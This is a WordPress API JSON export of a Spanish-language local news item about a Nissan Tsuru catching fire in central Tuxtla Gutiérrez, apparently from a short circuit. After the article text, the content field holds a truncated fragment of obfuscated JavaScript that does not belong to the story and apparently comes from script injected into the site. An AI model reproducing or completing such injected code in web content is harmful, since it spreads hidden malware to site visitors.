{"id":21047,"date":"2025-03-25T03:25:06","date_gmt":"2025-03-25T03:25:06","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21047"},"modified":"2025-03-25T03:25:07","modified_gmt":"2025-03-25T03:25:07","slug":"se-incendia-unidad-en-el-centro-de-la-capital-chiapaneca","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21047","title":{"rendered":"Se incendia unidad en el centro de la capital chiapaneca"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"899\" height=\"836\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250324-WA0086.jpg\" alt=\"\" class=\"wp-image-21048\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250324-WA0086.jpg 899w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250324-WA0086-300x279.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250324-WA0086-768x714.jpg 768w\" sizes=\"auto, (max-width: 899px) 100vw, 899px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 24 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Este lunes en el centro de la capital chiapaneca se incendi\u00f3 una unidad Nissan tipo Tsuru de cuatro puertas color blanco.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el coche circulaba sobre la 6a Sur y al llegar a la 4a Poniente comenz\u00f3 a incendiarse de la parte frontal y las llamas r\u00e1pido se extendieron.<\/p>\n\n\n\n<p>El conductor de la unidad detuvo su marcha y comenz\u00f3 a pedir auxilio y los vecinos y comerciantes salieron con agua en cubetas.<\/p>\n\n\n\n<p>Al lugar arribaron elementos del cuerpo de Bomberos para sofocar el incendio dejando cuantiosos da\u00f1os materiales.<\/p>\n\n\n\n<p>En el lugar se dijo que la causa de este siniestro fue un corto circuito.<\/p>\n\n\n\n<p>Despu\u00e9s de sofocado el incendio la unidad fue llevada a un corral\u00f3n en turno.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 24 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Este lunes en el centro de la capital chiapaneca se incendi\u00f3 una unidad Nissan tipo Tsuru de cuatro puertas color blanco. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el coche circulaba sobre la 6a Sur y al llegar a la 4a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21048,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-21047","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21047","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21047"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21047\/revisions"}],"predecessor-version":[{"id":21049,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21047\/revisions\/21049"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21048"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21047"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21047"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21047"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}